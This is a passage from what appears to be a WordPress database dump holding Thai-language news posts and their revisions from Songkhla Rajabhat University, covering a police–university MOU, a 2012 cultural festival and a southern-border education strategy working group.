จากนั้นตำรวจกับประชาชนก็จะร่วมมือกันแก้ปัญหาให้ตรงตามความต้องการทฤษฎีตำรวจผู้รับใช้ชุมชน ซึ่งการร่วมมือกับเครือข่ายมหาวิทยาลัยราชภัฏทั่วประเทศทั้ง 40 แห่ง จะทำให้ได้รับทราบปัญหา อุปสรรค และผลสำเร็จของโครงการฯ โดยมีตำรวจทางหลวงเป็นหน่วยงานนำร่อง เพื่อเป็นแนวทางการทำงานตามทฤษฎีตำรวจผู้รับใช้ชุมชน และต้องการใช้เป็นตัวอย่างในการทำงานตามแนวทางใหม่ให้กับตำรวจนครบาล หรือตำรวจภูธรทั่วประเทศต่อไป\r\n\r\nรศ.ดร.เปรื่อง กิจรัตน์ภร ประธานที่ประชุมอธิการบดีมหาวิทยาลัยราชภัฏ เปิดเผยว่า มหาวิทยาลัยราชภัฏมีแนวทางการทำงานที่ใกล้ชิดกับท้องถิ่นมาโดยตลอด และมีความชำนาญในการเข้าถึงชุมชนและประชาชนในแต่ละพื้นที่ได้เป็นอย่างดี โดยการจัดทำโครงการร่วมกันในครั้งนี้ มรภ.สงขลา รับเป็นผู้ดำเนินการ และประสานงานกับเครือข่ายมหาวิทยาลัยราชภัฏทั่วประเทศ ในการสำรวจความคิดเห็นของประชาชนในชุมชนเป้าหมาย', 'เครือข่ายราชภัฏ ทำ ‘MOU’ ประเมินผลงาน ตร.ทางหลวง', '', 'publish', 'closed', 'open', '', '%e0%b9%80%e0%b8%84%e0%b8%a3%e0%b8%b7%e0%b8%ad%e0%b8%82%e0%b9%88%e0%b8%b2%e0%b8%a2%e0%b8%a3%e0%b8%b2%e0%b8%8a%e0%b8%a0%e0%b8%b1%e0%b8%8f-%e0%b8%97%e0%b8%b3-mou-%e0%b8%9b%e0%b8%a3', '', '', '2019-05-27 09:36:06', '2019-05-27 02:36:06', '', 0, 'http://172.17.40.11/wp511/?p=633', 0, 'post', '', 0),
(634, 1, '2019-05-27 09:36:06', '2019-05-27 02:36:06', 'เครือข่ายราชภัฏ ทำ ‘MOU’ ประเมินผลงาน ตร.ทางหลวง\r\n\r\n<b>มหาวิทยาลัยราชภัฏทั่วประเทศ ลงนามข้อตกลงความร่วมมือตำรวจทางหลวง ประเมินผลโครงการคืนชุมชนสีขาวให้สังคมไทย ภายใต้หลักการตำรวจผู้รับใช้ชุมชน</b>\r\n\r\nดร.แสนศักดิ์ ศิริพานิช รองอธิการบดีฝ่ายวิจัยและชุมชนสัมพันธ์ มหาวิทยาลัยราชภัฏสงขลา (มรภ.สงขลา) เปิดเผยว่า เมื่อวันที่ 28 กรกฎาคม ที่ผ่านมา มรภ.สงขลา ได้ร่วมลงนามข้อตกลงความร่วมมือตามโครงการคืนชุมชนสีขาวให้สังคมไทยโดยตำรวจทางหลวง ภายใต้หลักการตำรวจผู้รับใช้ชุมชน (Community Policing) ณ กระทรวงศึกษาธิการ ระหว่าง รศ.ดร.เปรื่อง กิจรัตน์ภร ประธานที่ประชุมอธิการบดีมหาวิทยาลัยราชภัฏ พร้อมด้วยอธิการบดี มรภ.สงขลา ผศ.ดร.ไพโรจน์ ด้วงวิเศษ และอธิการบดีมหาวิทยาลัยราชภัฏทั่วประเทศทั้ง 40 แห่ง กับ พล.ต.ต.นรบุญ แน่นหนา ผู้บังคับการตำรวจทางหลวง สำนักงานตำรวจแห่งชาติ ในการสำรวจความคิดเห็นของประชาชนต่อการดำเนินงานและประเมินผลความสำเร็จโครงการฯ โดยคณะทำงานได้จัดทำแบบสอบถามวัดระดับความพึงพอใจในการให้บริการแก่ประชาชน และจะสรุปรายงาน วิเคราะห์ปัจจัยความสำเร็จ ปัญหาและอุปสรรคของโครงการ เพื่อให้เกิดความบริสุทธิ์ยุติธรรม มีประสิทธิภาพและต่อเนื่อง ทั้งนี้ข้อตกลงเบื้องต้นจะมีการเก็บข้อมูลในชุมชนเป้าหมาย 40 ชุมชนทั่วประเทศ ใน 3 ช่วงเวลา คือ ช่วงเริ่มดำเนินการ (กันยายน 2555) ช่วงระหว่างดำเนินการ (พฤษภาคม 2556) และ ช่วงหลังดำเนินการ (ธันวาคม 2556) เพื่อให้ได้ข้อมูลที่สามารถสะท้อนความสำเร็จของโครงการฯ ตามที่ตั้งไว้อย่างแท้จริง และเป็นการเรียนรู้ในการทำงานร่วมกันอย่างสร้างสรรค์ระหว่างหน่วยงานทั้งสอง และชุมชนเป้าหมาย ซึ่งจะก่อให้เกิดประโยชน์ต่อชุมชน สังคม และประเทศชาติ ต่อไป\r\n\r\nด้าน พล.ต.ต.นรบุญ แน่นหนา ผู้บังคับการตำรวจทางหลวง กล่าวว่า ในการดำเนินโครงการจะให้เจ้าหน้าที่ตำรวจทางหลวงที่ผ่านการฝึกอบรม เข้าไปคลุกคลี เรียนรู้และแลกเปลี่ยนความคิดเห็นกับคนในชุมชน รวมถึงศึกษาข้อมูลอาชญากรรม และรวบรวมรายละเอียดสภาพแวดล้อมความเป็นมาของชุมชน เพื่อวางแผนป้องกันอาชญากรรมที่จะเกิดขึ้นในชุมชนนั้นๆ โดยนำหลักรัฐศาสตร์มาประยุกต์ใช้ ร่วมกับการบังคับใช้กฎหมาย เพื่อสร้างความไว้วางใจระหว่างตำรวจกับชาวบ้าน โดยให้ตำรวจชุดดังกล่าวเปลี่ยนทิศทางการทำงาน จากการเป็นผู้ใช้อำนาจบังคับใช้กฎหมายกับประชาชน เป็นการหันหน้าเข้าหาประชาชน ทำหน้าที่ปกป้องและให้บริการ สร้างความคุ้นเคยด้วยความจริงใจ เมื่อประชาชนไว้วางใจก็จะให้ข้อมูล ให้ข่าว บอกปัญหาและความต้องการให้ทราบ จากนั้นตำรวจกับประชาชนก็จะร่วมมือกันแก้ปัญหาให้ตรงตามความต้องการทฤษฎีตำรวจผู้รับใช้ชุมชน ซึ่งการร่วมมือกับเครือข่ายมหาวิทยาลัยราชภัฏทั่วประเทศทั้ง 40 แห่ง จะทำให้ได้รับทราบปัญหา อุปสรรค และผลสำเร็จของโครงการฯ โดยมีตำรวจทางหลวงเป็นหน่วยงานนำร่อง เพื่อเป็นแนวทางการทำงานตามทฤษฎีตำรวจผู้รับใช้ชุมชน และต้องการใช้เป็นตัวอย่างในการทำงานตามแนวทางใหม่ให้กับตำรวจนครบาล หรือตำรวจภูธรทั่วประเทศต่อไป\r\n\r\nรศ.ดร.เปรื่อง กิจรัตน์ภร ประธานที่ประชุมอธิการบดีมหาวิทยาลัยราชภัฏ เปิดเผยว่า มหาวิทยาลัยราชภัฏมีแนวทางการทำงานที่ใกล้ชิดกับท้องถิ่นมาโดยตลอด และมีความชำนาญในการเข้าถึงชุมชนและประชาชนในแต่ละพื้นที่ได้เป็นอย่างดี โดยการจัดทำโครงการร่วมกันในครั้งนี้ มรภ.สงขลา รับเป็นผู้ดำเนินการ และประสานงานกับเครือข่ายมหาวิทยาลัยราชภัฏทั่วประเทศ ในการสำรวจความคิดเห็นของประชาชนในชุมชนเป้าหมาย', 'เครือข่ายราชภัฏ ทำ ‘MOU’ ประเมินผลงาน ตร.ทางหลวง', '', 'inherit', 'closed', 'closed', '', '633-revision-v1', '', '', '2019-05-27 09:36:06', '2019-05-27 02:36:06', '', 633, 'http://172.17.40.11/wp511/?p=634', 0, 'revision', '', 0),
(635, 1, '2019-05-27 09:36:41', '2019-05-27 02:36:41', 'มรภ.สงขลา แถลงข่าวจัดงาน “วัฒนธรรมสัมพันธ์ ปี 2555” และ “งานส่งเสริมศิลปวัฒนธรรมอุดมศึกษา ครั้งที่ 13″\r\n\r\nขนหนังตะลุง มโนราห์ อวดสายตาประเทศกลุ่มประชาคมอาเซียน\r\n\r\n<b>มหาวิทยาลัยราชภัฏสงขลา เปิดบ้านจัด 2 งานใหญ่ “วัฒนธรรมสัมพันธ์ ปี 2555” ควบเจ้าภาพ “งานส่งเสริมศิลปวัฒนธรรมอุดมศึกษา ครั้งที่ 13 ขนหนังตะลุง มโนราห์ อวดสายตาประเทศกลุ่มประชาคมอาเซียน และอีกกว่า 60 มหาวิทยาลัยทั่วประเทศ</b>\r\n\r\nผ.ศ.ดร. ไพโรจน์ ด้วงวิเศษ อธิการบดีมหาวิทยาลัยราชภัฏสงขลา (มรภ.สงขลา) เปิดเผยถึงงานวัฒนธรรมสัมพันธ์ รวมใจถวายแม่ของแผ่นดิน ระหว่างวันที่ 12-20 สิงหาคม 2555 ณ สนามกีฬา มรภ.สงขลา ว่าเป็นงานที่ยิ่งใหญ่กว่าทุกปี เนื่องจากมีประเทศในกลุ่มประชาคมอาเซียนอาทิ เวียดนาม อินโดนีเซีย จีน ฯลฯ นำชุดการแสดงมาร่วมแลกเปลี่ยนวัฒนธรรม ซึ่งเป็นการเตรียมความพร้อมในการเข้าสู่ประชาคมอาเซียนต่อไปในอนาคต\r\n\r\nสำหรับกิจกรรมภายในงานวัฒนธรรมสัมพันธ์ปีนี้ มรภ.สงขลา จะนำชุดการแสดงที่สะท้อนถึงศิลปวัฒนธรรมของภาคใต้อย่าง หนังตะลุงและมโนราห์ ถ่ายทอดสู่สายตาต่างประเทศ และมหาวิทยาลัยต่างๆ กว่า 60 แห่ง ที่มาร่วมงานส่งเสริมศิลปวัฒนธรรมอุดมศึกษา ครั้งที่ 13 นี้ด้วย\r\n\r\nอธิการบดี มรภ.สงขลา กล่าวเพิ่มเติมว่า สำหรับงานส่งเสริมศิลปวัฒนธรรมอุดมศึกษา ครั้งที่ 13 ซึ่ง มรภ.สงขลา รับเป็นเจ้าภาพในปีนี้ จัดขึ้นระหว่างวันที่ 12-14 สิงหาคม 2555 เพื่อเปิดโอกาสให้สถาบันอุดมศึกษาได้นำศิลปวัฒนธรรมแต่ละภูมิภาค ซึ่งเป็นผลงานการแสดงของนิสิตนักศึกษาจากสถาบันอุดมศึกษาทั่วประเทศ ได้ร่วมแลกเปลี่ยนด้านศิลปวัฒนธรรมท้องถิ่นของกันและกัน เป็นการศึกษาเรียนรู้จากประสบการณ์จริงนอกห้องเรียน ประกอบกับในปี 2555 เป็นวโรกาสมหามงคลเฉลิมพระชนมพรรษา 80 พรรษา สมเด็จพระนางเจ้าพระบรมราชินีนาถ องค์อุปถัมภ์ศิลปะพื้นบ้านโนรา ในโครงการสืบสานวัฒนธรรมทักษิณ ซึ่งเป็นโครงการตามแนวพระราชดำริของพระองค์ท่าน มรภ.สงขลา ถือเป็นมหามงคลสมัยที่จะเชิญชวนสถาบันอุดมศึกษาทั่วประเทศ ใช้โอกาสนี้ร่วมเฉลิมฉลองและแสดงความจงรักษ์ภักดีสำนึกในพระมหากรุณาธิคุณของพระองค์ท่านในฐานะที่ทรงเป็นสมเด็จแม่ของแผ่นดินสยาม ที่ทรงมีพระมหากรุณาธิคุณส่งเสริมศิลปะไทยทุกแขนง\r\n\r\nด้าน นางรจนา ศรีใส ผู้อำนวยการสำนักศิลปะและวัฒนธรรม มหาวิทยาลัยราชภัฏสงขลา กล่าวเสริมว่า กิจกรรม “งานส่งเสริมศิลปวัฒนธรรมอุดมศึกษา ครั้งที่ 13” จะเริ่มต้นในวันที่ 12-14 สิงหาคม 2555 หลังจากนั้นจะเป็นงานประจำปี “วัฒนธรรมสัมพันธ์ ปี 2555” จัดขึ้นระหว่างวันที่ 14- 20 สิงหาคม 2555 โดยจัดให้มีกิจกรรมต่าง ๆ ที่ส่งเสริมศิลปวัฒนธรรม เริ่มตั้งแต่ ตลาดน้ำ เรือเกย ซึ่งจัดให้เป็นส่วนจำหน่ายสินค้า อาหารพื้นเมือง บริเวณฝั่งประตูเข้าที่ 3 ตามด้วยลานบุญ “ทวดช้าง” สิ่งศักดิ์สิทธิ์อันเป็นที่เคารพของชาวจังหวัดสงขลา พร้อมกับ การออกบูธของหน่วยงานราชการที่พร้อมใจเข้าร่วมกิจกรรมนี้ ซึ่งตลอดเส้นทางเดินยังมีการจัดแสดงทางด้านวัฒนธรรม และการจัดแสดงสินค้า OTOP หลากหลายร้านให้ผู้ร่วมงานได้เลือกซื้อ และกิจกรรมบันเทิงอื่นๆ อีกมากมาย\r\n\r\nนอกจากนั้นภายในหอประชุมเฉลิมพระเกียรติ จะมีการจัดกิจกรรมภาคกลางวันทุกวัน อาทิ การจัดกิจกรรมประกวดวาดภาพที่เกี่ยวกับสมเด็จพระนางเจ้าพระบรมราชินีนาถ ภายใต้หัวข้อ “ ธ ทรงเป็นแม่ของแผ่นดิน” และอื่น ๆ อีกหลายกิจกรรม ที่สำคัญเพื่อเป็นการเตรียมความพร้อมเข้าสู่ประชาคมอาเซียน ในด้านการแลกเปลี่ยนวัฒนธรรม ซึ่งได้รับความร่วมมือจาก มหาวิทยาลัยฮานอย ประเทศเวียดนาม สถาบันอีซี ณ เมืองสุราบายา ประเทศอินโดนีเซีย และ มหาวิทยาลัยจากมณฑลยูนาน ประเทศจีน ที่จะส่งการแสดงเข้าร่วมในงานดังกล่าวด้วย มหาวิทยาลัยราชภัฏสงขลาจึงขอเชิญชวนทุกท่านเข้าร่วมงาน <b> “วัฒนธรรมสัมพันธ์ ปี 2555” และ “งานส่งเสริมศิลปวัฒนธรรมอุดมศึกษา ครั้งที่ 13″ </b>ในช่วงวันและเวลาดังกล่าว', 'มรภ.สงขลา แถลงข่าวจัดงาน “วัฒนธรรมสัมพันธ์ ปี 2555”', '', 'publish', 'closed', 'open', '', '%e0%b8%a1%e0%b8%a3%e0%b8%a0-%e0%b8%aa%e0%b8%87%e0%b8%82%e0%b8%a5%e0%b8%b2-%e0%b9%81%e0%b8%96%e0%b8%a5%e0%b8%87%e0%b8%82%e0%b9%88%e0%b8%b2%e0%b8%a7%e0%b8%88%e0%b8%b1%e0%b8%94%e0%b8%87%e0%b8%b2%e0%b8%99', '', '', '2019-05-27 09:36:41', '2019-05-27 02:36:41', '', 0, 'http://172.17.40.11/wp511/?p=635', 0, 'post', '', 0),
(636, 1, '2019-05-27 09:36:41', '2019-05-27 02:36:41', 'มรภ.สงขลา แถลงข่าวจัดงาน “วัฒนธรรมสัมพันธ์ ปี 2555” และ “งานส่งเสริมศิลปวัฒนธรรมอุดมศึกษา ครั้งที่ 13″\r\n\r\nขนหนังตะลุง มโนราห์ อวดสายตาประเทศกลุ่มประชาคมอาเซียน\r\n\r\n<b>มหาวิทยาลัยราชภัฏสงขลา เปิดบ้านจัด 2 งานใหญ่ “วัฒนธรรมสัมพันธ์ ปี 2555” ควบเจ้าภาพ “งานส่งเสริมศิลปวัฒนธรรมอุดมศึกษา ครั้งที่ 13 ขนหนังตะลุง มโนราห์ อวดสายตาประเทศกลุ่มประชาคมอาเซียน และอีกกว่า 60 มหาวิทยาลัยทั่วประเทศ</b>\r\n\r\nผ.ศ.ดร. ไพโรจน์ ด้วงวิเศษ อธิการบดีมหาวิทยาลัยราชภัฏสงขลา (มรภ.สงขลา) เปิดเผยถึงงานวัฒนธรรมสัมพันธ์ รวมใจถวายแม่ของแผ่นดิน ระหว่างวันที่ 12-20 สิงหาคม 2555 ณ สนามกีฬา มรภ.สงขลา ว่าเป็นงานที่ยิ่งใหญ่กว่าทุกปี เนื่องจากมีประเทศในกลุ่มประชาคมอาเซียนอาทิ เวียดนาม อินโดนีเซีย จีน ฯลฯ นำชุดการแสดงมาร่วมแลกเปลี่ยนวัฒนธรรม ซึ่งเป็นการเตรียมความพร้อมในการเข้าสู่ประชาคมอาเซียนต่อไปในอนาคต\r\n\r\nสำหรับกิจกรรมภายในงานวัฒนธรรมสัมพันธ์ปีนี้ มรภ.สงขลา จะนำชุดการแสดงที่สะท้อนถึงศิลปวัฒนธรรมของภาคใต้อย่าง หนังตะลุงและมโนราห์ ถ่ายทอดสู่สายตาต่างประเทศ และมหาวิทยาลัยต่างๆ กว่า 60 แห่ง ที่มาร่วมงานส่งเสริมศิลปวัฒนธรรมอุดมศึกษา ครั้งที่ 13 นี้ด้วย\r\n\r\nอธิการบดี มรภ.สงขลา กล่าวเพิ่มเติมว่า สำหรับงานส่งเสริมศิลปวัฒนธรรมอุดมศึกษา ครั้งที่ 13 ซึ่ง มรภ.สงขลา รับเป็นเจ้าภาพในปีนี้ จัดขึ้นระหว่างวันที่ 12-14 สิงหาคม 2555 เพื่อเปิดโอกาสให้สถาบันอุดมศึกษาได้นำศิลปวัฒนธรรมแต่ละภูมิภาค ซึ่งเป็นผลงานการแสดงของนิสิตนักศึกษาจากสถาบันอุดมศึกษาทั่วประเทศ ได้ร่วมแลกเปลี่ยนด้านศิลปวัฒนธรรมท้องถิ่นของกันและกัน เป็นการศึกษาเรียนรู้จากประสบการณ์จริงนอกห้องเรียน ประกอบกับในปี 2555 เป็นวโรกาสมหามงคลเฉลิมพระชนมพรรษา 80 พรรษา สมเด็จพระนางเจ้าพระบรมราชินีนาถ องค์อุปถัมภ์ศิลปะพื้นบ้านโนรา ในโครงการสืบสานวัฒนธรรมทักษิณ ซึ่งเป็นโครงการตามแนวพระราชดำริของพระองค์ท่าน มรภ.สงขลา ถือเป็นมหามงคลสมัยที่จะเชิญชวนสถาบันอุดมศึกษาทั่วประเทศ ใช้โอกาสนี้ร่วมเฉลิมฉลองและแสดงความจงรักษ์ภักดีสำนึกในพระมหากรุณาธิคุณของพระองค์ท่านในฐานะที่ทรงเป็นสมเด็จแม่ของแผ่นดินสยาม ที่ทรงมีพระมหากรุณาธิคุณส่งเสริมศิลปะไทยทุกแขนง\r\n\r\nด้าน นางรจนา ศรีใส ผู้อำนวยการสำนักศิลปะและวัฒนธรรม มหาวิทยาลัยราชภัฏสงขลา กล่าวเสริมว่า กิจกรรม “งานส่งเสริมศิลปวัฒนธรรมอุดมศึกษา ครั้งที่ 13” จะเริ่มต้นในวันที่ 12-14 สิงหาคม 2555 หลังจากนั้นจะเป็นงานประจำปี “วัฒนธรรมสัมพันธ์ ปี 2555” จัดขึ้นระหว่างวันที่ 14- 20 สิงหาคม 2555 โดยจัดให้มีกิจกรรมต่าง ๆ ที่ส่งเสริมศิลปวัฒนธรรม เริ่มตั้งแต่ ตลาดน้ำ เรือเกย ซึ่งจัดให้เป็นส่วนจำหน่ายสินค้า อาหารพื้นเมือง บริเวณฝั่งประตูเข้าที่ 3 ตามด้วยลานบุญ “ทวดช้าง” สิ่งศักดิ์สิทธิ์อันเป็นที่เคารพของชาวจังหวัดสงขลา พร้อมกับ การออกบูธของหน่วยงานราชการที่พร้อมใจเข้าร่วมกิจกรรมนี้ ซึ่งตลอดเส้นทางเดินยังมีการจัดแสดงทางด้านวัฒนธรรม และการจัดแสดงสินค้า OTOP หลากหลายร้านให้ผู้ร่วมงานได้เลือกซื้อ และกิจกรรมบันเทิงอื่นๆ อีกมากมาย\r\n\r\nนอกจากนั้นภายในหอประชุมเฉลิมพระเกียรติ จะมีการจัดกิจกรรมภาคกลางวันทุกวัน อาทิ การจัดกิจกรรมประกวดวาดภาพที่เกี่ยวกับสมเด็จพระนางเจ้าพระบรมราชินีนาถ ภายใต้หัวข้อ “ ธ ทรงเป็นแม่ของแผ่นดิน” และอื่น ๆ อีกหลายกิจกรรม ที่สำคัญเพื่อเป็นการเตรียมความพร้อมเข้าสู่ประชาคมอาเซียน ในด้านการแลกเปลี่ยนวัฒนธรรม ซึ่งได้รับความร่วมมือจาก มหาวิทยาลัยฮานอย ประเทศเวียดนาม สถาบันอีซี ณ เมืองสุราบายา ประเทศอินโดนีเซีย และ มหาวิทยาลัยจากมณฑลยูนาน ประเทศจีน ที่จะส่งการแสดงเข้าร่วมในงานดังกล่าวด้วย มหาวิทยาลัยราชภัฏสงขลาจึงขอเชิญชวนทุกท่านเข้าร่วมงาน <b> “วัฒนธรรมสัมพันธ์ ปี 2555” และ “งานส่งเสริมศิลปวัฒนธรรมอุดมศึกษา ครั้งที่ 13″ </b>ในช่วงวันและเวลาดังกล่าว', 'มรภ.สงขลา แถลงข่าวจัดงาน “วัฒนธรรมสัมพันธ์ ปี 2555”', '', 'inherit', 'closed', 'closed', '', '635-revision-v1', '', '', '2019-05-27 09:36:41', '2019-05-27 02:36:41', '', 635, 'http://172.17.40.11/wp511/?p=636', 0, 'revision', '', 0),
(637, 1, '2019-05-27 09:37:07', '2019-05-27 02:37:07', 'มรภ.สงขลา ตั้งคณะทำงานวางยุทธศาสตร์การศึกษา สอดคล้องอัตลักษณ์จังหวัดชายแดนใต้\r\n\r\n<b>มรภ.สงขลา ตั้งคณะทำงานวางยุทธศาสตร์การศึกษาที่เหมาะกับอัตลักษณ์จังหวัดชายแดนใต้ เครือข่ายอุดมศึกษาฯ เห็นพ้อง ส่งบุคลากรเข้าร่วมโครงการตามบริบทของพื้นที่</b>\r\n\r\nดร.แสนศักดิ์ ศิริพานิช รองอธิการบดีฝ่ายวิจัยและชุมชนสัมพันธ์ มหาวิทยาลัยราชภัฏสงขลา (มรภ.สงขลา) เปิดเผยว่า มรภ.สงขลา ได้ตั้งคณะทำงานจัดทำข้อเสนอโครงการจัดทำยุทธศาสตร์การศึกษาที่เหมาะสมกับอัตลักษณ์ของจังหวัดชายแดนใต้ เพื่อการพัฒนาท้องถิ่น โดยที่ประชุมเครือข่ายอุดมศึกษาจังหวัดชายแดนใต้ ได้มีมติให้การสนับสนุนงบประมาณจากสำนักงานคณะกรรมการอุดมศึกษา (สกอ.) ปีงบประมาณ 2556 และส่งบุคลากรเข้าร่วมโครงการตามบริบทของพื้นที่ โดยที่ประชุมเครือข่ายอุดมศึกษาจังหวัดชายแดนใต้เล็งเห็นว่าการจัดทำยุทธศาสตร์ในพื้นที่จังหวัดชายแดนภาคใต้ ควรปรับให้เกิดความสอดคล้องกับยุทธศาสตร์ที่มีลักษณะเฉพาะหรือมีเอกลักษณ์ในความเป็นพื้นที่และบริบทต่างๆ\r\n\r\nรองอธิการบดีฝ่ายวิจัยและชุมชนสัมพันธ์ มรภ.สงขลา กล่าวว่า การจัดทำยุทธศาสตร์การศึกษาที่เหมาะสมกับอัตลักษณ์ของจังหวัดชายแดนใต้ จะช่วยให้สามารถเข้าใจบริบทที่เกี่ยวข้องกับการศึกษาในพื้นที่ที่มีความเป็นพหุวัฒนธรรมค่อนข้างสูง และช่วยให้เข้าใจถึงสภาพปัญหาที่เกิดจากระบบการศึกษาที่ใช้อยู่ในปัจจุบันของนักเรียน นักศึกษา และผู้ที่มีส่วนเกี่ยวข้องกับระบบการศึกษาในพื้นที่จังหวัดชายแดนใต้ รวมไปถึงสามารถพัฒนาระบบการศึกษา ด้วยการกำหนดยุทธศาสตร์ทางด้านการศึกษาจากการทำโครงการนี้ได้อย่างบูรณาการมากขึ้น ซึ่งการพัฒนาการศึกษาในพื้นที่จังหวัดชายแดนภาคใต้ดังกล่าว สามารถนำไปเป็นแนวทางการสร้างสันติสุขในจังหวัดชายแดนภาคใต้ และเป็นพลังในการขับเคลื่อนให้เกิดการแก้ปัญหาในพื้นที่ต่อไป\r\n\r\nดร.แสนศักดิ์ กล่าวอีกว่า โครงการดังกล่าว เป็นการทำงานต่อเนื่องจากที่สถาบันพระปกเกล้า โดยนักศึกษาหลักสูตรการเสริมสร้างสังคมสันติสุข รุ่นที่ 3 ได้จัดเวทีรับฟังความคิดเห็นในหัวข้อเยาวชนสามจังหวัดชายแดนใต้ ในเส้นทางสันติวิธีกับระบบการศึกษาที่เหมาะสมในระดับอุดมศึกษา ในจังหวัดปัตตานี ยะลา และ นราธิวาส ไปก่อนหน้านี้ โดยมีกลุ่มนักวิชาการและอาจารย์มหาวิทยาลัยในเครือข่ายอุดมศึกษาจังหวัดชายแดนใต้ ได้แก่ มหาวิทยาลัยสงขลานครินทร์ วิทยาเขตหาดใหญ่ และวิทยาเขตปัตตานี มหาวิทยาลัยราชภัฏยะลา มหาวิทยาลัยอิสลามยะลา มหาวิทยาลัยนราธิวาสราชนครินทร์ มหาวิทยาลัยทักษิณ มหาวิทยาลัยราชมงคลศรีวิชัย มหาวิทยาลัยราชภัฏสงขลา และมหาวิทยาลัยราชภัฏสงขลา วิทยาเขตสตูล ร่วมนำเสนอมุมมองที่หลากหลายต่อระบบการศึกษาในจังหวัดชายแดนภาคใต้ ซึ่งการนำเสนอในครั้งนั้นนักการศึกษาอุดมศึกษาจังหวัดชายแดนภาคใต้ ต้องการให้มีการปรับเปลี่ยนระบบการศึกษาใหม่ในพื้นที่จังหวัดชายแดนภาคใต้ เพื่อให้เกิดการพัฒนาระบบการศึกษาที่ส่งเสริมและสอดคล้องต่อวิถีชีวิตของประชาชน', 'มรภ.สงขลา ตั้งคณะทำงานวางยุทธศาสตร์การศึกษา', '', 'publish', 'closed', 'open', '', '%e0%b8%a1%e0%b8%a3%e0%b8%a0-%e0%b8%aa%e0%b8%87%e0%b8%82%e0%b8%a5%e0%b8%b2-%e0%b8%95%e0%b8%b1%e0%b9%89%e0%b8%87%e0%b8%84%e0%b8%93%e0%b8%b0%e0%b8%97%e0%b8%b3%e0%b8%87%e0%b8%b2%e0%b8%99%e0%b8%a7%e0%b8%b2', '', '', '2019-05-27 09:37:07', '2019-05-27 02:37:07', '', 0, 'http://172.17.40.11/wp511/?p=637', 0, 'post', '', 0),
(638, 1, '2019-05-27 09:37:07', '2019-05-27 02:37:07', 'มรภ.สงขลา ตั้งคณะทำงานวางยุทธศาสตร์การศึกษา สอดคล้องอัตลักษณ์จังหวัดชายแดนใต้\r\n\r\n<b>มรภ.สงขลา ตั้งคณะทำงานวางยุทธศาสตร์การศึกษาที่เหมาะกับอัตลักษณ์จังหวัดชายแดนใต้ เครือข่ายอุดมศึกษาฯ เห็นพ้อง ส่งบุคลากรเข้าร่วมโครงการตามบริบทของพื้นที่</b>\r\n\r\nดร.แสนศักดิ์ ศิริพานิช รองอธิการบดีฝ่ายวิจัยและชุมชนสัมพันธ์ มหาวิทยาลัยราชภัฏสงขลา (มรภ.สงขลา) เปิดเผยว่า มรภ.สงขลา ได้ตั้งคณะทำงานจัดทำข้อเสนอโครงการจัดทำยุทธศาสตร์การศึกษาที่เหมาะสมกับอัตลักษณ์ของจังหวัดชายแดนใต้ เพื่อการพัฒนาท้องถิ่น โดยที่ประชุมเครือข่ายอุดมศึกษาจังหวัดชายแดนใต้ ได้มีมติให้การสนับสนุนงบประมาณจากสำนักงานคณะกรรมการอุดมศึกษา (สกอ.) ปีงบประมาณ 2556 และส่งบุคลากรเข้าร่วมโครงการตามบริบทของพื้นที่ โดยที่ประชุมเครือข่ายอุดมศึกษาจังหวัดชายแดนใต้เล็งเห็นว่าการจัดทำยุทธศาสตร์ในพื้นที่จังหวัดชายแดนภาคใต้ ควรปรับให้เกิดความสอดคล้องกับยุทธศาสตร์ที่มีลักษณะเฉพาะหรือมีเอกลักษณ์ในความเป็นพื้นที่และบริบทต่างๆ\r\n\r\nรองอธิการบดีฝ่ายวิจัยและชุมชนสัมพันธ์ มรภ.สงขลา กล่าวว่า การจัดทำยุทธศาสตร์การศึกษาที่เหมาะสมกับอัตลักษณ์ของจังหวัดชายแดนใต้ จะช่วยให้สามารถเข้าใจบริบทที่เกี่ยวข้องกับการศึกษาในพื้นที่ที่มีความเป็นพหุวัฒนธรรมค่อนข้างสูง และช่วยให้เข้าใจถึงสภาพปัญหาที่เกิดจากระบบการศึกษาที่ใช้อยู่ในปัจจุบันของนักเรียน นักศึกษา และผู้ที่มีส่วนเกี่ยวข้องกับระบบการศึกษาในพื้นที่จังหวัดชายแดนใต้ รวมไปถึงสามารถพัฒนาระบบการศึกษา ด้วยการกำหนดยุทธศาสตร์ทางด้านการศึกษาจากการทำโครงการนี้ได้อย่างบูรณาการมากขึ้น ซึ่งการพัฒนาการศึกษาในพื้นที่จังหวัดชายแดนภาคใต้ดังกล่าว สามารถนำไปเป็นแนวทางการสร้างสันติสุขในจังหวัดชายแดนภาคใต้ และเป็นพลังในการขับเคลื่อนให้เกิดการแก้ปัญหาในพื้นที่ต่อไป\r\n\r\nดร.แสนศักดิ์ กล่าวอีกว่า โครงการดังกล่าว เป็นการทำงานต่อเนื่องจากที่สถาบันพระปกเกล้า โดยนักศึกษาหลักสูตรการเสริมสร้างสังคมสันติสุข รุ่นที่ 3 ได้จัดเวทีรับฟังความคิดเห็นในหัวข้อเยาวชนสามจังหวัดชายแดนใต้ ในเส้นทางสันติวิธีกับระบบการศึกษาที่เหมาะสมในระดับอุดมศึกษา ในจังหวัดปัตตานี ยะลา และ นราธิวาส ไปก่อนหน้านี้ โดยมีกลุ่มนักวิชาการและอาจารย์มหาวิทยาลัยในเครือข่ายอุดมศึกษาจังหวัดชายแดนใต้ ได้แก่ มหาวิทยาลัยสงขลานครินทร์ วิทยาเขตหาดใหญ่ และวิทยาเขตปัตตานี มหาวิทยาลัยราชภัฏยะลา มหาวิทยาลัยอิสลามยะลา มหาวิทยาลัยนราธิวาสราชนครินทร์ มหาวิทยาลัยทักษิณ มหาวิทยาลัยราชมงคลศรีวิชัย มหาวิทยาลัยราชภัฏสงขลา และมหาวิทยาลัยราชภัฏสงขลา วิทยาเขตสตูล ร่วมนำเสนอมุมมองที่หลากหลายต่อระบบการศึกษาในจังหวัดชายแดนภาคใต้ ซึ่งการนำเสนอในครั้งนั้นนักการศึกษาอุดมศึกษาจังหวัดชายแดนภาคใต้ ต้องการให้มีการปรับเปลี่ยนระบบการศึกษาใหม่ในพื้นที่จังหวัดชายแดนภาคใต้ เพื่อให้เกิดการพัฒนาระบบการศึกษาที่ส่งเสริมและสอดคล้องต่อวิถีชีวิตของประชาชน', 'มรภ.สงขลา ตั้งคณะทำงานวางยุทธศาสตร์การศึกษา', '', 'inherit', 'closed', 'closed', '', '637-revision-v1', '', '', '2019-05-27 09:37:07', '2019-05-27 02:37:07', '', 637, 'http://172.17.40.11/wp511/?p=638', 0, 'revision', '', 0),
